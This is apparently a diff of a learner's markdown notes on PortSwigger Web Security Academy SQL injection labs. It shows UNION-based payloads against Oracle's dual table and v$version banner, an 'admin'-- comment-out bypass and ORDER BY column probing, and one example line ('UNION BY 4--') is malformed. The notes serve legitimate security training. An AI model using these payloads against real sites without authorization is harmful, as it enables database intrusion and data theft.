IOxCyber/CyberEssentials/Security-Tools/Burp_Suite/PortSwigger-WebSecAcad/Web_Vuln-Insights/SQL Injection/SQLi_Labs.md

 ### Injections:
 - `'admin'--'` - Commenting out the remaining portion of the original query.

-## Lab 3: SQL injection attack, querying the database type and version on Oracle `Union Query`
-- On Oracle databases, every SELECT statement must specify a table to select FROM.
-- If your `UNION SELECT` attack does not query from a table, you will still need to include the `FROM` keyword followed by a valid table name.
-- There is a `built-in table on Oracle called 'dual'` For example: `UNION SELECT 'abc' FROM dual`

-- Original Query: `SELECT * FROM products WHERE category = 'Gifts'`
-- Modified: `SELECT * FROM products WHERE category = 'Gifts' UNION SELECT 'abc','def' FROM dual--`
-- Query to executed by DB after injections: `SELECT * FROM products WHERE category = 'Gifts'' UNION SELECT 'abc','def' FROM dual--`
-- To get the Oracle Version: `SELECT * FROM products WHERE category = 'Gifts'union+SELECT+banner,NULL+FROM+v$version--`

-### Injections:
-- `'union+SELECT+banner,NULL+FROM+v$version--` - Concate the second query with Union clause in Original Query.

-## Lab 4: SQL injection UNION attack, determining the number of columns returned by the query
+## Lab 3: SQL injection UNION attack, determining the number of columns returned by the query
 1. ' ORDER BY 1-- injecting a series of ORDER BY clauses and incrementing the specified column index until an error occurs.
 - Original Query: `SELECT * FROM products WHERE category = 'Gifts'`
 - Modified: `SELECT * FROM products WHERE category = 'Gifts' UNION BY 4--`